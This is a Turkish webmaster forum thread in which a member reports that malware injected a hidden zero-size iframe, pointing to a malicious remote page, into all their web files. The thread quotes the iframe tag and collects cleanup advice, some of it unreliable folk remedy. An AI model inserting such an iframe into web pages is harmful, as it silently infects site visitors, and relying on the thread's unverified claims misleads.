İyinet'e Hoşgeldiniz!

Türkiye'nin En Eski Webmaster Forum'una Hemen Kayıt Olun!

Kayıt Ol!

böyle bişi ilk defa görüyorum. ( Dikkat edin bu durumlara )

Permission

0
İyinet Üyesi
Reaction score
3
böyle bişi ilk defa görüyorum. ( Dikkat edin bu durumlara )

Arkdaşlar dün bir site benim siteye üye olmuştu kontrol sırasında virüs uyarısı verdi sonra virüsü temizledim şimdi bir baktım bütün web dosyalarıma bir freme atılmış

<iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
siteye girmeyin virüslüü

bütün web sayfalarıma bu fremeyi atmışşş bütün sitelerimdeki dosylara ( html + asp + php ) nasıl temizlenir bu nasıl yapmıştır sizce..

siz siz olun bilmediğiniz sitelere girmeyin derim

visitistanbul

0
İyinet Üyesi
Reaction score
9
Sanki bu konuyla ilgili birileri uyarı yapmıştı geçmişte hatırlıyorum ama nerede olduğunu bilmiyorum ya .. Hatta çözümü de yok diye hatırlıyorum tekrar geçmiş olsun

ploop

0
İyinet Üyesi
Reaction score
0
bütün sayfalarında topluca değisiklik yaptıysan bu kodu atıyor o program.

Permission

0
İyinet Üyesi
Reaction score
3
evet pc deki bütün web dosyalrıama bulaşmış cakmadan dosya yeneileme yapıp atsaydım siteme sitemden virüs bulaşcaktı..

o yüzden pcye sitelerimin yedekleirni ftp den indirip ghost atıcam pc yee

xfatihx

0
İyinet Üyesi
Reaction score
0
Firefox kullanmış olsan böyle bir sorun yaşamıycaktin geçmiş olsun..

aooksar

0
İyinet Üyesi
Reaction score
0
evt oyle bır duruma dusmus olmayı düşünemiyorum.. Biterdim vallahi..
gecmiş olsun arkadasım

DeviLLe

0
İyinet Üyesi
Reaction score
0

GaLadRe

0
İyinet Üyesi
Reaction score
0
Pc miz üzerinden saldırı yapmayı sağlayan bir virüs bu ve bulunan siteye girergirmez geçiyor . Botnette kullanıyorlar . Şuanda yapılacak fazla bişey yok tüm programları geçiyor .

GaLadRe

0
İyinet Üyesi
Reaction score
0
Yedek hdd ye (d) bulaşmıyor . Ben neredeyse tüm programları deneyip en sonunda format attım . En güvenlisi bir klasör açıp d ye önemli dosyaları zipleyip orada bulundurmak . Bu sorun küçük bir sorun değil belli şimdiden aşırı yayılmaya başladı (c) de önemli bişey bulundurmayın en azından format atılır arada bir . Pclerimizden sağa sola saldırı oluyor bu virüste açılan exe 1 2 3 4 5 gibi e haliyle cpu zorlanıyor .

sempaty

1
İyinet Üyesi
Reaction score
19
virüsten kurtulduktan sonra, advanced find and replace http://www.abacre.com/afr/ bu programla tüm hardiskinizde bulaşanları silebilirsiniz. programda türkçe dil desteği de var. deneme sürümü (sanırım 21 gün)

belirtmeniz gereken her dosyaya eklediği kodları programı açıp find kısmına yazmak

Türkiye’nin ilk webmaster forum sitesi iyinet.com'da forum üyeleri tarafından yapılan tüm paylaşımlardan; Türk Ceza Kanunu’nun 20. Maddesinin, 5651 Sayılı Kanununun 4. maddesinin 2. fıkrasına göre, paylaşım yapan üyeler sorumludur.

Backlink ve Tanıtım Yazısı için iletişime geçmek için Skype Adresimiz: .cid.1580508955483fe5